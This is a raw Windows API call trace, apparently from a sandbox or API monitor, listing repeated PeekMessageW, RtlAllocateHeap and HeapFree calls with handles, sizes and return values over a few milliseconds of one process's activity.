PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a70 [0155.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0155.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5d0 [0155.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0155.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5d0 | out: hHeap=0x8a0000) returned 1 [0155.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a70 | out: hHeap=0x8a0000) returned 1 [0155.159] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x91d5a8 | out: hHeap=0x8a0000) returned 1 [0155.159] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.159] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a70 [0155.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5d0 [0155.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0155.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0155.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5b8 [0155.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0155.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a60 [0155.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a40 [0155.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0155.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a10 [0155.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a40 | out: hHeap=0x8a0000) returned 1 [0155.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5d0 | out: hHeap=0x8a0000) returned 1 [0155.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5b8 | out: hHeap=0x8a0000) returned 1 [0155.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a70 | out: hHeap=0x8a0000) returned 1 [0155.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a70 [0155.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a40 [0155.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a10 | out: hHeap=0x8a0000) returned 1 [0155.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0155.160] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0155.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0155.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0155.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0155.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x91d5a8 [0155.160] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0155.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5b8 [0155.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a10 [0155.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0155.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a20 [0155.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a10 | out: hHeap=0x8a0000) returned 1 [0155.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a10 [0155.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a10 | out: hHeap=0x8a0000) returned 1 [0155.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0155.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5b8 | out: hHeap=0x8a0000) returned 1 [0155.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0155.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5b8 [0155.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0155.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5b8 | out: hHeap=0x8a0000) returned 1 [0155.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0155.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.161] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0155.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0155.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0155.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a10 [0155.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5b8 [0155.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0155.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0155.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a10 | out: hHeap=0x8a0000) returned 1 [0155.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0155.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5b8 | out: hHeap=0x8a0000) returned 1 [0155.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0155.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a40 | out: hHeap=0x8a0000) returned 1 [0155.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a70 | out: hHeap=0x8a0000) returned 1 [0155.162] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.162] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a70 [0155.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5b8 [0155.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a40 [0155.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a40 | out: hHeap=0x8a0000) returned 1 [0155.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a40 [0155.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a40 | out: hHeap=0x8a0000) returned 1 [0155.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5b8 | out: hHeap=0x8a0000) returned 1 [0155.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a70 | out: hHeap=0x8a0000) returned 1 [0155.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5b8 [0155.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a70 [0155.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5b8 | out: hHeap=0x8a0000) returned 1 [0155.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a70 | out: hHeap=0x8a0000) returned 1 [0155.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.162] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a70 [0155.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a40 | out: hHeap=0x8a0000) returned 1 [0155.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a40 | out: hHeap=0x8a0000) returned 1 [0155.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5b8 | out: hHeap=0x8a0000) returned 1 [0155.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a70 | out: hHeap=0x8a0000) returned 1 [0155.163] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.163] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a40 | out: hHeap=0x8a0000) returned 1 [0155.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a40 | out: hHeap=0x8a0000) returned 1 [0155.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5b8 | out: hHeap=0x8a0000) returned 1 [0155.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a70 | out: hHeap=0x8a0000) returned 1 [0155.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5b8 | out: hHeap=0x8a0000) returned 1 [0155.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a70 | out: hHeap=0x8a0000) returned 1 [0155.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.163] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a40 | out: hHeap=0x8a0000) returned 1 [0155.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a40 | out: hHeap=0x8a0000) returned 1 [0155.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5b8 | out: hHeap=0x8a0000) returned 1 [0155.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a70 | out: hHeap=0x8a0000) returned 1 [0155.163] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.163] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a40 | out: hHeap=0x8a0000) returned 1 [0155.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a40 | out: hHeap=0x8a0000) returned 1 [0155.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5b8 | out: hHeap=0x8a0000) returned 1 [0155.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a70 | out: hHeap=0x8a0000) returned 1 [0155.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5b8 | out: hHeap=0x8a0000) returned 1 [0155.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a70 | out: hHeap=0x8a0000) returned 1 [0155.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.164] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a40 | out: hHeap=0x8a0000) returned 1 [0155.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a40 | out: hHeap=0x8a0000) returned 1 [0155.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.164] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.164] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.164] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.164] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.164] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.164] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.164] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.164] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.164] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.164] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.164] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.164] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.164] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.164] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.164] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.164] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.164] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.164] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.164] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.164] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.164] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.164] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.164] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.164] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.164] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.164] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.165] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.165] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.165] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.165] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.165] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.165] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.165] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.165] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.165] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.165] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.165] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.165] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.165] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.165] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.165] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.165] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.165] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.165] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.165] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.165] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 